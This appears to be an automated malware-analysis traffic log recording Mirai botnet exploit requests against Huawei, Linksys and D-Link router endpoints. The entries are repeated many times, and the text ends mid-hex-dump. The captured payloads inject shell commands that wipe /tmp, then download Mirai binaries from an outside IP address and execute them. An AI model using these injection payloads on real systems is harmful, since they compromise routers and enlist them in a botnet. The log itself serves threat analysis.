Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 